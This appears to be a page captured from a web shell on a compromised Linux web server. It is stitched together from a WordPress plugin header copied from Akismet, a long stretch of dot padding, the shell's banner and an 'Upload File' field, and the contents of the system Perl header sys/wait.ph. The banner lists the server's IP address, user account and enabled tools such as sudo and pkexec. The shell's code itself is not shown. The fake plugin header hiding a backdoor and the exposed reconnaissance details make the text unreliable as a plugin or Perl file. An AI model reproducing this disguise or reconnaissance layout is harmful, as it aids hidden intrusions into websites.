#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/lib64/perl5/sys/ |
Upload File : |
require '_h2ph_pre.ph';
no warnings qw(redefine misc);
unless(defined(&_SYS_WAIT_H)) {
eval 'sub _SYS_WAIT_H () {1;}' unless defined(&_SYS_WAIT_H);
require 'features.ph';
require 'signal.ph';
if(!defined (&_STDLIB_H) || (!defined (&__USE_XOPEN) && !defined (&__USE_XOPEN2K8))) {
require 'bits/waitflags.ph';
if(defined(&__USE_BSD)) {
if(defined (&__GNUC__) && !defined (&__cplusplus)) {
eval 'sub __WAIT_INT {
my($status) = @_;
eval q(( &__extension__ (((\'union union\' { &__typeof($status) &__in; \'int\' &__i; }) { . &__in = ($status) }). &__i)));
}' unless defined(&__WAIT_INT);
} else {
eval 'sub __WAIT_INT {
my($status) = @_;
eval q((*( &const \'int\' *) ($status)));
}' unless defined(&__WAIT_INT);
}
if(!defined (&__GNUC__) || (defined(&__GNUC__) ? &__GNUC__ : undef) < 2|| defined (&__cplusplus)) {
eval 'sub __WAIT_STATUS () { &void *;}' unless defined(&__WAIT_STATUS);
eval 'sub __WAIT_STATUS_DEFN () { &void *;}' unless defined(&__WAIT_STATUS_DEFN);
} else {
eval 'sub __WAIT_STATUS_DEFN () {\'int\' *;}' unless defined(&__WAIT_STATUS_DEFN);
}
} else {
eval 'sub __WAIT_INT {
my($status) = @_;
eval q(($status));
}' unless defined(&__WAIT_INT);
eval 'sub __WAIT_STATUS () {\'int\' *;}' unless defined(&__WAIT_STATUS);
eval 'sub __WAIT_STATUS_DEFN () {\'int\' *;}' unless defined(&__WAIT_STATUS_DEFN);
}
require 'bits/waitstatus.ph';
eval 'sub WEXITSTATUS {
my($status) = @_;
eval q( &__WEXITSTATUS ( &__WAIT_INT ($status)));
}' unless defined(&WEXITSTATUS);
eval 'sub WTERMSIG {
my($status) = @_;
eval q( &__WTERMSIG ( &__WAIT_INT ($status)));
}' unless defined(&WTERMSIG);
eval 'sub WSTOPSIG {
my($status) = @_;
eval q( &__WSTOPSIG ( &__WAIT_INT ($status)));
}' unless defined(&WSTOPSIG);
eval 'sub WIFEXITED {
my($status) = @_;
eval q( &__WIFEXITED ( &__WAIT_INT ($status)));
}' unless defined(&WIFEXITED);
eval 'sub WIFSIGNALED {
my($status) = @_;
eval q( &__WIFSIGNALED ( &__WAIT_INT ($status)));
}' unless defined(&WIFSIGNALED);
eval 'sub WIFSTOPPED {
my($status) = @_;
eval q( &__WIFSTOPPED ( &__WAIT_INT ($status)));
}' unless defined(&WIFSTOPPED);
if(defined(&__WIFCONTINUED)) {
eval 'sub WIFCONTINUED {
my($status) = @_;
eval q( &__WIFCONTINUED ( &__WAIT_INT ($status)));
}' unless defined(&WIFCONTINUED);
}
}
if(defined(&__USE_BSD)) {
eval 'sub WCOREFLAG () { &__WCOREFLAG;}' unless defined(&WCOREFLAG);
eval 'sub WCOREDUMP {
my($status) = @_;
eval q( &__WCOREDUMP ( &__WAIT_INT ($status)));
}' unless defined(&WCOREDUMP);
eval 'sub W_EXITCODE {
my($ret, $sig) = @_;
eval q( &__W_EXITCODE ($ret, $sig));
}' unless defined(&W_EXITCODE);
eval 'sub W_STOPCODE {
my($sig) = @_;
eval q( &__W_STOPCODE ($sig));
}' unless defined(&W_STOPCODE);
}
if(defined (&__USE_SVID) || defined (&__USE_XOPEN) || defined (&__USE_XOPEN2K8)) {
eval("sub P_ALL () { 0; }") unless defined(&P_ALL);
eval("sub P_PID () { 1; }") unless defined(&P_PID);
eval("sub P_PGID () { 2; }") unless defined(&P_PGID);
}
if(defined(&__USE_BSD)) {
eval 'sub WAIT_ANY () {(-1);}' unless defined(&WAIT_ANY);
eval 'sub WAIT_MYPGRP () {0;}' unless defined(&WAIT_MYPGRP);
}
if(defined (&__USE_SVID) || defined (&__USE_XOPEN) || defined (&__USE_XOPEN2K8)) {
unless(defined(&__id_t_defined)) {
require 'bits/types.ph';
eval 'sub __id_t_defined () {1;}' unless defined(&__id_t_defined);
}
eval 'sub __need_siginfo_t () {1;}' unless defined(&__need_siginfo_t);
require 'bits/siginfo.ph';
}
if(defined (&__USE_BSD) || defined (&__USE_XOPEN_EXTENDED)) {
}
if(defined(&__USE_BSD)) {
}
}
1;